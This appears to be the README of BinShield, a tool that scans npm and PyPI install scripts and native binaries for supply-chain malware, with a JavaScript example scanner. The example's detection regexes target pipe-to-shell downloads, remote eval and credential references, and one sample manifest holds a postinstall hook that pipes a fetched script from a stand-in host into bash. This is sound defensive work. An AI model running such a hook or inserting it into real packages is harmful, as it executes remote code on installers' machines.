Catch malicious install scripts and native binaries in your dependencies, before they reach production.
BinShield is a supply-chain security platform for the npm and PyPI ecosystems. It analyzes the two things attackers actually weaponize (install scripts and native binaries), classifies their behavior with AI, cross-references known-malware feeds, and warns you the moment a package you depend on turns malicious.
binshield.dev · GitHub Action · Docs
A wave of supply-chain worms (Shai-Hulud and its kin) has shown how fast a single compromised npm/PyPI package spreads. Two attack surfaces matter:
- Install scripts. A malicious `postinstall` hook (or a PyPI `setup.py`) runs arbitrary code on every machine that installs the package: stealing `NPM_TOKEN`/cloud credentials, opening reverse shells, dropping wipers. Most SCA tools never read the `scripts` field.
- Native binaries. Compiled `.node`/`.so`/`.dylib`/`.wasm` addons hide payloads that no source-level scanner decompiles.

BinShield covers both.
| Capability | Detail |
|---|---|
| Install-script analysis | Scans npm lifecycle hooks (`preinstall`/`install`/`postinstall`/`prepare`) and PyPI `setup.py`/`pyproject.toml` for `curl \| bash`, eval of remote code, credential exfiltration, wipers, reverse shells, and obfuscated payloads. |
| Native binary analysis | Ghidra-powered decompilation (with a heuristic fallback) plus YARA pattern matching on .node/.so/.dylib/.wasm. |
| AI classification | xAI Grok classifies decompiled binaries and install scripts into a supply-chain threat taxonomy; a deterministic heuristic floor runs when AI is unavailable. |
| Known-malware feed | Cross-references every scan against OSV malicious-package advisories (MAL-*); a confirmed match forces a critical verdict. |
| Proactive alerts | When a malicious package is discovered, BinShield matches it against your watchlists and scanned lockfiles and alerts you via email / Slack / webhook. |
| CI gating | A GitHub Action scans every PR's dependencies and blocks merges on risky packages. |
| Reports | CycloneDX SBOM export and SOC 2 / ISO 27001 / EU CRA compliance reports. |
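
The install-script check from the table, sketched as an added JavaScript example. It is not BinShield's code: the rule ids, patterns, severities and sample manifests are assumptions constructed for illustration, and it covers only npm lifecycle hooks.

```javascript
// Added example, not BinShield's code. Rule ids and patterns are hypothetical.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];
const RANK = { none: 0, medium: 1, high: 2, critical: 3 };

const RULES = [
  // Download piped straight into a shell interpreter.
  { id: 'pipe-to-shell', severity: 'critical',
    re: /\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z|da)?sh\b/i },
  // eval of something fetched over the network.
  { id: 'remote-eval', severity: 'critical',
    re: /\beval\b.*(https?:\/\/|\$\(\s*(curl|wget)\b)/i },
  // Hook touches publish/cloud credentials (a weak signal on its own).
  { id: 'credential-reference', severity: 'high',
    re: /\b(NPM_TOKEN|GITHUB_TOKEN|AWS_SECRET_ACCESS_KEY)\b|\.npmrc\b/ },
  // Inline decoding that often hides the real command.
  { id: 'encoded-payload', severity: 'medium',
    re: /base64\s+(-d|--decode)\b|Buffer\.from\([^)]*['"]base64['"]\)/ },
];

// Returns { verdict, findings } for one package.json given as a string.
function scanManifest(manifestJson) {
  let manifest;
  try { manifest = JSON.parse(manifestJson); }
  catch { return { verdict: 'unparseable', findings: [] }; }
  const scripts = manifest && typeof manifest.scripts === 'object' ? manifest.scripts || {} : {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== 'string') continue; // ignore missing or malformed entries
    for (const { id, severity, re } of RULES) {
      if (re.test(cmd)) findings.push({ hook, rule: id, severity });
    }
  }
  // The verdict is the worst severity seen across all hooks.
  const verdict = findings.reduce(
    (worst, f) => (RANK[f.severity] > RANK[worst] ? f.severity : worst), 'none');
  return { verdict, findings };
}

// Constructed sample manifests (not real packages).
const SAMPLES = {
  benign: '{"name":"ok-pkg","scripts":{"prepare":"tsc -p .","test":"vitest"}}',
  dropper: '{"name":"x","scripts":{"postinstall":"curl -s https://example.invalid/i.sh | bash"}}',
  tokenUse: '{"name":"y","scripts":{"preinstall":"node setup.js --token $NPM_TOKEN"}}',
  broken: '{"scripts": ',
};
for (const [name, json] of Object.entries(SAMPLES)) console.log(name, JSON.stringify(scanManifest(json)));
```

Only the four lifecycle hooks are inspected, so a pattern in `test` or `build` is not flagged: those scripts do not run on install.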

```mermaid
flowchart LR
  subgraph Sources
    A[API / Dashboard scan] --> Q
    F[npm registry feed] --> Q
    C[Crawler / discovery] --> Q
  end
  Q[analysis_jobs queue] --> W
  subgraph W[Analysis worker]
    direction TB
    AC[Acquire package] --> EX[Extract binaries]
    AC --> MS[Install-script analysis]
    EX --> DC[Decompile + YARA]
    DC --> CL[AI classify]
    MS --> CL
    CL --> RS[Risk score + malware feed]
  end
  RS --> DB[(Supabase)]
  RS --> AL[Alert loop]
  DB --> WEB[Web app]
  DB --> ACT[GitHub Action]
  AL --> N[Email / Slack / Webhook]
```

```bash
corepack enable   # provides pnpm 10
pnpm install
pnpm dev          # web app at http://localhost:3000
```

BinShield ships a demo fallback: the web app, API, and worker all run without live credentials (seeded corpus, in-memory store, bundled fixtures), so you can explore the product before wiring up Supabase / xAI / Stripe.

```bash
pnpm --filter @binshield/api dev                                    # API server
BINSHIELD_WORKER_MODE=daemon pnpm --filter @binshield/worker dev    # worker
pnpm typecheck && pnpm test && pnpm build                           # the validation gate
```

Add the GitHub Action to block malicious dependencies on every PR:

```yaml
- uses: ashlrai/binshield/apps/github-action@v1
  with:
    api-key: ${{ secrets.BINSHIELD_API_KEY }}
    fail-on: high
```

See `apps/github-action/README.md` for inputs, scan modes, and SBOM export.

| Path | Description |
|---|---|
| `apps/web` | Next.js 15 frontend: public package database and dashboard |
| `apps/api` | Hono API: search, scans, orgs, advisories, billing |
| `apps/worker` | Analysis worker: binary + install-script pipeline, feed, crawler |
| `apps/github-action` | CI scanner that gates PRs on dependency risk |
| `apps/video` | Remotion project for the demo video |
| `packages/analysis-types` | Shared domain types and sample data |
| `packages/risk-engine` | Deterministic risk scoring |
| `packages/config` | Environment parsing and product constants |
| `packages/ui` | Shared UI components |
| `packages/cli` | Command-line entry points |

MIT. See LICENSE.